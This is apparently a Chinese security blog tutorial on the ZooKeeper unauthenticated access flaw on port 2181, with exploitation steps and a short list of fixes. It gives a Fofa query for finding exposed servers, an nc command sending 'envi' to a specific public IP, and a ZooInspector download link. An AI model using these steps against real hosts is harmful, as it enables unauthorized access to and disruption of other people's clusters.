Zookeeper未授权访问漏洞

Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

步骤一:使用以下Fofa语法搜索资产信息....

复制代码
port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试..

复制代码
echo envi | nc 106.227.19.24 2181

步骤三:可使用Zookeeper可视化管理工具进行连接....

复制代码
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

漏洞修复

  1. 修改 ZooKeeper 默认端口,采用其他端口服务。
  2. 添加访问控制,配置服务来源地址限制策略。
  3. 增加 ZooKeeper 的认证配置。
相关推荐
Viking_bird1 小时前
Apache Spark 3.2.0 开发测试环境部署指南
大数据·分布式·ajax·spark·apache
励志成为糕手2 小时前
企业级Spring事务管理:从单体应用到微服务分布式事务完整方案
分布式·spring·微服务·隔离级别·事务管理
wdxylb3 小时前
云原生俱乐部-杂谈1
服务器·云原生
Fireworkitte3 小时前
Kafka的ISR、OSR、AR详解
分布式·kafka·ar
Apache RocketMQ5 小时前
云原生事件驱动引擎(RocketMQ-EventBridge)应用场景与技术解析
云原生·消息队列·rocketmq·事件驱动引擎
AKAMAI19 小时前
AI需要防火墙,云计算需要重新构想
人工智能·云原生·云计算
小猿姐1 天前
KubeBlocks for Milvus 揭秘
数据库·云原生
wdxylb1 天前
云原生俱乐部-RH134知识点总结(2)
linux·云原生
deeper_wind1 天前
k8s-单主机Master集群部署+单个pod部署lnmp论坛服务(小白的“升级打怪”成长之路)
云原生·容器·kubernetes